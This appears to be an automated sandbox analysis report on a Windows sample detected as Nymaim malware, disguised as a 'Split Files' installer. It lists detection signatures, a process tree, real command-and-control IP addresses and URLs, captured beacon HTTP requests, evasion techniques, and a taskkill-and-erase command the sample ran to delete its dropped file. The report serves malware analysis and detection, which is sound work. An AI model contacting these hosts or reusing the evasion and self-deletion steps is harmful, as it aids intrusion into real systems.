Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	778228
MD5:	e0f8085c7cb8eb9cf1c263bb12cfc6df
SHA1:	a109ebcf251a1e69923c60330994190e40ab466c
SHA256:	a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
Tags:	exe
Infos:

Detection

Nymaim

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Yara detected Nymaim

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Uses taskkill to terminate processes

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to detect sandboxes (foreground window change detection)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

file.exe (PID: 2148 cmdline: C:\Users\user\Desktop\file.exe MD5: E0F8085C7CB8EB9CF1C263BB12CFC6DF)

is-DTRND.tmp (PID: 6048 cmdline: "C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp" /SL4 $902D6 "C:\Users\user\Desktop\file.exe" 1818498 170496 MD5: E8176050192FBB976D70238E3C121F4C)

SplitFiles131.exe (PID: 4360 cmdline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe" MD5: 361518D6CC3C25EEC2DFC1DE82B055B2)

KN38AzDG.exe (PID: 1960 cmdline: MD5: 3FB36CB0B7172E5298D2992D42984D06)

cmd.exe (PID: 1876 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 5224 cmdline: taskkill /im "SplitFiles131.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Unpacked PEs

Source	Rule	Description	Author
5.2.SplitFiles131.exe.3340000.3.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
5.2.SplitFiles131.exe.400000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
5.2.SplitFiles131.exe.400000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
5.2.SplitFiles131.exe.3340000.3.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security

Snort Signatures

ETPRO TROJAN GCleaner Downloader - Payload Response - Source IP: 107.182.129.235 - Destination IP: 192.168.2.5

Timestamp:	107.182.129.235192.168.2.580497062852925 01/05/23-08:47:10.017687
SID:	2852925
Source Port:	80
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN GCleaner Downloader Activity M8 - Source IP: 192.168.2.5 - Destination IP: 45.139.105.171

Timestamp:	192.168.2.545.139.105.17149705802041920 01/05/23-08:47:09.800462
SID:	2041920
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) - Source IP: 192.168.2.5 - Destination IP: 107.182.129.235

Timestamp:	192.168.2.5107.182.129.23549706802852981 01/05/23-08:47:09.990287
SID:	2852981
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) - Source IP: 192.168.2.5 - Destination IP: 107.182.129.235

Timestamp:	192.168.2.5107.182.129.23549706802852980 01/05/23-08:47:09.925610
SID:	2852980
Source Port:	49706
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://171.22.30.106/library.php	URL Reputation: Label: malware
Source: http://171.22.30.106/library.phpch	Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.phpYQ	Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.php4	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe

ReversingLabs: Detection: 50%

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Joe Sandbox ML: detected

Source: 5.2.SplitFiles131.exe.10000000.6.unpack	Avira: Label: TR/Crypt.XPACK.Gen8
Source: 1.2.file.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2
Source: 1.0.file.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen2

Source: 5.2.SplitFiles131.exe.400000.0.unpack

Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_10001000 ISCryptGetVersion,	4_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_10001130 ArcFourCrypt,	4_2_10001130
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,	5_2_00403770

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Unpacked PE file: 5.2.SplitFiles131.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,	4_2_0046CA68
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	4_2_00474A14
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045157C FindFirstFileA,GetLastError,	4_2_0045157C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	4_2_0045E244
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0048AC5C FindFirstFileA,6CAD69D0,FindNextFileA,FindClose,	4_2_0048AC5C
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,	4_2_00472CD4
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,	4_2_0045CDA4
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,	4_2_0045DEB0
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	5_2_00404490
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_00423E2D FindFirstFileExW,	5_2_00423E2D
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe	Code function: 5_2_1000959D FindFirstFileExW,	5_2_1000959D
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\KN38AzDG.exe	Code function: 6_2_00104A1A FindFirstFileExW,	6_2_00104A1A

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.5:49705 -> 45.139.105.171:80
Source: Traffic	Snort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
Source: Traffic	Snort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
Source: Traffic	Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.5:49706

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 45.139.105.1
Source: Malware configuration extractor	IPs: 85.31.46.167
Source: Malware configuration extractor	IPs: 107.182.129.235
Source: Malware configuration extractor	IPs: 171.22.30.106

Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS
Source: Joe Sandbox View	ASN Name: CMCSUS CMCSUS

Source: Joe Sandbox View

IP Address: 45.139.105.171 45.139.105.171

Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235
Source: unknown	TCP traffic detected without corresponding DNS query: 107.182.129.235

Source: SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.php
Source: SplitFiles131.exe, 00000005.00000003.332714577.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.327425336.00000000043C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.php4
Source: SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.338258725.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.phpYQ
Source: SplitFiles131.exe, 00000005.00000003.354343284.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.366040028.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.343762944.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.349052998.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, SplitFiles131.exe, 00000005.00000003.360534891.00000000043C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://171.22.30.106/library.phpch
Source: is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-3OAED.tmp.4.dr, is-FBKGV.tmp.4.dr	String found in binary or memory: http://rus.altarsoft.com/split_files.shtml
Source: is-DTRND.tmp, 00000004.00000002.373470298.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.374801354.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-8E2LT.tmp.4.dr, is-7O3KV.tmp.4.dr, is-R2P47.tmp.4.dr, is-JMARM.tmp.4.dr, is-B20UO.tmp.4.dr, is-UJJ0L.tmp.4.dr, is-JSP8F.tmp.4.dr, is-79U67.tmp.4.dr, is-APJVT.tmp.4.dr, is-7L4JB.tmp.4.dr	String found in binary or memory: http://www.altarsoft.com/split_files.shtml
Source: file.exe	String found in binary or memory: http://www.innosetup.com
Source: is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	String found in binary or memory: http://www.innosetup.com/
Source: file.exe, 00000001.00000003.289316432.00000000020FD000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288963142.00000000022D9000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	String found in binary or memory: http://www.innosetup.comDVarFileInfo$
Source: file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/?ps
Source: file.exe, 00000001.00000003.289027881.0000000002058000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000003.288799915.0000000002230000.00000004.00001000.00020000.00000000.sdmp, is-DTRND.tmp, 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, is-AGVDF.tmp.4.dr, is-DTRND.tmp.1.dr	String found in binary or memory: http://www.remobjects.com/?psU

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe

Code function: 5_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

5_2_00401B30

Source: global traffic	HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache

Source: file.exe, 00000001.00000002.376583060.00000000007AA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 5.2.SplitFiles131.exe.3340000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SplitFiles131.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SplitFiles131.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.SplitFiles131.exe.3340000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.372442187.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.372529330.0000000003340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_00408280	1_2_00408280
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00468C28	4_2_00468C28
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00461280	4_2_00461280
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0043DE40	4_2_0043DE40
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004302D0	4_2_004302D0
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004445B8	4_2_004445B8
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00434864	4_2_00434864
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0047AA90	4_2_0047AA90
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00444B60	4_2_00444B60
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0045ADE0	4_2_0045ADE0
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00480F94	4_2_00480F94
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00445258	4_2_00445258
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_004132E1	4_2_004132E1
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00463288	4_2_00463288
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00435568	4_2_00435568
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_00445664	4_2_00445664
Source: C:\Users\user\AppData\Local\Temp\is-LMEP0.tmp\is-DTRND.tmp	Code function: 4_2_0042F874	4_2_0042F874
